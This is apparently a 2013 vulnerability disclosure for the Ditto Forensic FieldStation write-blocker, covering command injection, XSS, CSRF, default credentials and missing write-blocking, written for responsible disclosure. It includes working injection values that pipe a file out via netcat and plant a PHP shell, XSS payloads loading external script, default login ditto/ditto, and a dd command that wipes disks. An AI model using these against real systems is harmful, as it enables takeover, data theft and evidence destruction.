************************************************************** Title: Ditto Forensic FieldStation, multiple vulnerabilities Versions affected: <= 2013Oct15a (all) Vendor: CRU Wiebetech Discovered by: Martin Wundram Email: wundram@digitrace.de Date found: 2013-04-22 Date published: 2013-12-12 Status: partially patched ************************************************************** 0] ======== Introduction / Background / Impact ======== In computer forensics (http://en.wikipedia.org/wiki/Computer_forensics) one essential requirement is that evidence data does not get modified at all (or not unnoticed, at least). Therefore IT forensic experts use write-blockers to ensure a read-only access to evidence data like hard disks or USB mass storage. The Ditto Forensic FieldStation is such a special equipment (hardware with embedded software) used by forensic experts to analyse and copy evidence data in a safe and secure way. The ditto is explicitly marketed as a device to acquire data from network file shares, too. This means it is meant to be connected to possibly hostile networks of suspects. However it was found to be vulnerable up to the point of not being reliable as a computer forensic device. 1] ======== OS Command Injection ======== Class: Command Injection [CWE-77] Impact: Code execution Remotely Exploitable: Yes CVE Name: CVE-2013-6881 CVSS v2 Base Score: 10 Overall CVSS v2 Score: 9.2 CVSS v2 Vector: (AV:N/AC:L/Au:N/C:C/I:C/A:C/E:H/RL:O/RC:C/CDP:MH/TD:ND/CR:H/IR:H/AR:L) Several input fields of the web application are vulnerable to OS command injection. E.g. the application allows the setting of parameters like 'sector size' or 'skip count' for a forensic imaging task. Because of improper neutralization in combination with the web server running with root privileges, an attacker is able to access and manipulate the complete system. Example 1 (setting of 'sector size' = 1 with malicious content): 1;cat /opt/web/htdocs/index.php | nc 192.168.1.1 6666; Example 2 (setting of 'set-size' = 1 with copying a PHP shell from the external SD card): 1;cp /ditto/shell.php /opt/web/htdocs; 2] ======== Persistent XSS ======== Class: Cross-site Scripting [CWE-79] Impact: Code execution Remotely Exploitable: Yes Status: unpatched CVE Name: CVE-2013-6882 CVSS v2 Base Score: 9 Overall CVSS v2 Score (if patched): 9.2 CVSS v2 Vector: (AV:N/AC:L/Au:N/C:P/I:C/A:P/E:H/RL:O/RC:C/CDP:MH/TD:ND/CR:H/IR:H/AR:L) Overall CVSS v2 Score (unpatched): 10 The web application suffers from multiple vulnerabilities regarding XSS. The first one (a) is critical because an unauthorized attacker is able to push malicious code into the system and consequently attacking every user. The other ones (b) need authentication first. a) The web application logs every login (including the username) in a not sanitized way to a system log. Additionally, the web application embeds that system log rendered as HTML into the start page of every user who successfully logs in. Thus an unprivileged attacker can persistently inject malicious code which attacks all users of the vulnerable system immediately after their login. Example: POSTDATA= user=demo%3Cscript%3Ealert%281%29%3B%3C%2Fscript%3E &pass=demo&login=Log+In b) It is easily possible to submit malicious data as input into multiple HTML form fields (e.g. one can force the system to load externally hosted JavaScript code with <script src=http://www.hacker.tld/code.js></script>). This can result in dangerous situations where the (external) JavaScript code mangles the information displayed about important computer forensic key values whose integrity is crucial. Example: 784 PetaByte (PB) source disk instead of 32 GB, investigator "Al Capone", "verify actions: yes" instead of "no", ... 3] ======== Cross-Site Request Forgery ======== Class: Cross-Site Request Forgery [CWE-352] Impact: Application misuse Remotely Exploitable: Yes CVE Name: CVE-2013-6883 CVSS v2 Base Score: 6.6 Overall CVSS v2 Score: 8 CVSS v2 Vector: (AV:N/AC:H/Au:N/C:P/I:C/A:P/E:H/RL:O/RC:C/CDP:MH/TD:ND/CR:H/IR:H/AR:L) The web application is vulnerable to attacks using Cross-Site Request Forgery. E.g. the disk erase technique (correct settings are important for the reliable deletion of sensitive forensic data) can be changed with a simple POST request. 4] ======== Misconfigured Daemon Rights ======== Class: Configuration [CWE-16] Impact: Full system access The web server lighthttpd and the PHP engine are run as user 'root'. Thus injection weaknesses in the 'ditto' web application result in immediate full system access. 5] ======== Unneeded Daemons/Software ======== Class: Configuration [CWE-16] Impact: Attackable services Best matching CCE-ID: CCE-4268-9 Forensic usage needs only write-blocking and imaging of evidence data. However, the base system contains further active software and services. This helps attacking the system and escalating privileges. The tools/daemons are especially netcat and an active SSHd. Furthermore, the SSHd binds to the network port which is labeled as 'source' and thus intended for usage in supposedly hostile network environments - the network containing evidence data from suspects. 6] ======== Use of standard credentials ======== Class: Use of Hard-coded Credentials [CWE-798] Impact: unwanted full system access Remotely Exploitable: Yes CVE Name: CVE-2013-6884 CVSS v2 Base Score: 10 Overall CVSS v2 Score: 9.2 CVSS v2 Vector: (AV:N/AC:L/Au:N/C:C/I:C/A:C/E:H/RL:O/RC:C/CDP:MH/TD:ND/CR:H/IR:H/AR:L) The ditto write-blocker contains a default system user named 'ditto' with the default password 'ditto' which is allowed to elevate its user rights to root (sudo) without further authentication. In combination with the active SSHd, this vulnerability allows attackers full access to the ditto if it gets connected to the same/reachable network. 7] ======== Misconfigured Core System ======== Class: Configuration [CWE-16] Impact: Alteration of evidence data Remotely Exploitable: Yes Although explicitly marketed as a hardware write-blocker, the ditto does not implement any specific write-blocking mechanism at all. The underlying system is able to manipulate or even erase evidence on devices which are connected to the 'source side' of the ditto. The problem is: no hardware-level, no driver- level and no kernel-level (blockdev) write-blocking are implemented. Only the web application prevents the user from writing to the source media. That is just security by obscurity. Finally, every critical weakness or simple malfunction in the web application can potentiallly lead to overwriting of source/evidence data. Furthermore, the embedded Linux system itself mounts the system partition as writable. Thus malware could be persistently deployed! Example: One can simply overwrite supposedly write-protected source data (USB stick and SATA disk) with dd if=/dev/zero of=/dev/sda. 8] ======== Solution ======== Upgrade your ditto to the newest available firmware (2013Oct15a). Don't connect the device to potentially hostile networks. Examine your device if it has been manipulated at an earlier time (has someone placed a backdoor in the embedded Linux, or a malware which silently manipulates evidence data or copies of evidence data?). 9] ======== Report Timeline ======== 2013-04-22 Discovery of vulnerabilities 2013-04-23 First contact with vendor including agreement about later public disclosure 2013-04-26 Detailed information about vulnerabilities provided to vendor 2013-06-30 Vendor fixes some vulnerabilities with firmware 2013Jun30a 2013-10-15 Vendor fixes some vulnerabilities with firmware 2013Oct15a 2013-11-26 Information with details provided to vendor about upcoming public disclosure. Vendor gave feedback regarding technical accuracy of this report 2013-12-12 Public disclosure 10] ======== Discussion ======== Because integrity is of utmost importance during the forensic process (correct handling of evidence data and correct deduction of conclusions and implications), even small vulnerabilities in forensic tools and devices become critical. 11] ======== References ======== a) http://www.cru-inc.com/support/software-downloads/ditto-firmware- updates/ditto-firmware-release-notes-2013oct15a/ b) http://www.cru-inc.com/support/software-downloads/ditto-firmware- updates/ditto-firmware-release-notes-2013jun30a/ -- Diplom-Wirtschaftsinformatiker Martin G. Wundram DigiTrace GmbH - Kompetenz in IT-Forensik Geschäftsführer: Alexander Sigel, Martin Wundram Registergericht Köln, HR B 72919 USt-IdNr: DE278529699 Zollstockgürtel 59, 50969 Köln Telefon: 0221-6 77 86 95-0 Website: www.DigiTrace.de E-Mail: info@DigiTrace.deБрой прочитания на тази страница: 1068
Ditto Forensic FieldStation 2013Oct15a – Multiple Vulnerabilities